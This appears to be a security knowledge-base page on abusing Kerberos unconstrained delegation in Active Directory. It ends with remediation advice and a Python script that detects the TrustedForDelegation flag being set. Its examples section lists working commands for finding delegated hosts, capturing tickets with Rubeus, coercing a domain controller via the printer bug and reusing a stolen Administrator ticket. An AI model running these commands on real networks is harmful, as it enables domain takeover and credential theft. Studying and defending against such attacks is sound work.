Unconstrained Delegation

Description

Unconstrained delegation allows a service to impersonate any user who authenticates to it: the client's forwardable TGT is sent along with the service ticket and cached on the service host. If an attacker compromises a machine or account configured with unconstrained delegation, they can harvest the incoming Kerberos tickets (TGTs or service tickets) of privileged users and reuse them to access other services, including domain controllers. Classic coercion techniques (printer bug/MS-RPRN, WebDAV, SpoolSample, PetitPotam) can force privileged accounts to connect to a compromised delegated host.

Examples

Discover Unconstrained Delegation Principals

From a domain-joined host:

# PowerView
Get-DomainComputer -Unconstrained | Select Name, UserAccountControl

# Native AD module
Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" -Properties TrustedForDelegation

Coerce a Privileged Connection and Capture Tickets

Start a ticket monitor on the delegated host, then coerce a domain controller into connecting to it (printer bug):

# On the attacker-controlled delegated host
Rubeus monitor /interval:5 /nowrap

# From elsewhere, trigger MS-RPRN printer bug towards the delegated host
printerbug.py corp.local/user:[email protected] delegatedhost.corp.local

When a privileged account connects, its forwarded TGT appears in the monitor output; extract and reuse the ticket.

Abuse Captured Tickets for Lateral Movement

With a captured Administrator ticket injected, access privileged resources:

Rubeus asktgs /service:cifs/dc01.corp.local /ptt
dir \\dc01.corp.local\c$\Windows\System32

Remediation

  1. Eliminate unconstrained delegation
    • Replace with constrained delegation or remove delegation entirely.
    • Never allow unconstrained delegation on Tier 0 assets (DCs, ADFS, PKI).
  2. Segment and restrict
    • Isolate any remaining delegated hosts from critical infrastructure via firewall rules.
    • Disable inbound protocols commonly abused for coercion (e.g., MS‑RPRN) or patch and restrict access.
  3. Rotate secrets and monitor
    • Rotate service account credentials and purge tickets after configuration changes.
    • Alert on changes that set the TrustedForDelegation flag (userAccountControl bit 524288) on accounts other than domain controllers, which carry it by default, and on unusual ticket flows.
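The discovery filter above and remediation item 3 both come down to one userAccountControl bit. The following added example (not part of the original page) shows a defender-side check for it in two places: classifying LDAP results so that domain controllers, which are trusted for delegation by default, are not reported as findings, and detecting event 4742 (computer account changed) records where the bit was newly set. The event records and account names are constructed samples.

```python
# userAccountControl bits as defined for Active Directory
TRUSTED_FOR_DELEGATION = 0x80000     # 524288, the bit matched by the LDAP filter above
SERVER_TRUST_ACCOUNT = 0x2000        # domain controllers; unconstrained by default
WORKSTATION_TRUST_ACCOUNT = 0x1000   # member servers and workstations

# Constructed sample of event 4742 fields (hypothetical hosts and values).
# 0x1020 is a typical member computer UAC, 0x82000 a typical DC UAC.
SAMPLE_4742 = [
    {"TargetUserName": "FILESRV01$", "SubjectUserName": "jdoe",
     "OldUacValue": "0x1020", "NewUacValue": "0x81020"},   # flag newly set
    {"TargetUserName": "DC01$", "SubjectUserName": "SYSTEM",
     "OldUacValue": "0x82000", "NewUacValue": "0x82000"},  # DC, no change
    {"TargetUserName": "WEB02$", "SubjectUserName": "svc_deploy",
     "OldUacValue": "0x81020", "NewUacValue": "0x1020"},   # flag removed
]

def parse_uac(value: str) -> int:
    """Parse a UAC value as logged in 4742 (hex such as 0x1020, or decimal)."""
    return int(value, 0)

def unconstrained_non_dc(uac: int) -> bool:
    """True for an LDAP result that is unconstrained and not a domain controller.
    Use this on the userAccountControl of objects returned by the discovery query."""
    return bool(uac & TRUSTED_FOR_DELEGATION) and not (uac & SERVER_TRUST_ACCOUNT)

def account_tier(uac: int) -> str:
    if uac & SERVER_TRUST_ACCOUNT:
        return "dc"
    if uac & WORKSTATION_TRUST_ACCOUNT:
        return "member"
    return "other"

def find_delegation_changes(events):
    """Return an alert for every 4742 record where TrustedForDelegation went from off to on."""
    alerts = []
    for e in events:
        old, new = parse_uac(e["OldUacValue"]), parse_uac(e["NewUacValue"])
        if not (old & TRUSTED_FOR_DELEGATION) and (new & TRUSTED_FOR_DELEGATION):
            alerts.append({
                "target": e["TargetUserName"],
                "changed_by": e["SubjectUserName"],
                "tier": account_tier(new),   # "member" is the case that needs follow-up
            })
    return alerts

if __name__ == "__main__":
    for a in find_delegation_changes(SAMPLE_4742):
        print(f"ALERT: {a['target']} ({a['tier']}) set TrustedForDelegation by {a['changed_by']}")
```

Clearing the bit (the WEB02$ record) is not alerted on here; it is the expected outcome of remediation item 1.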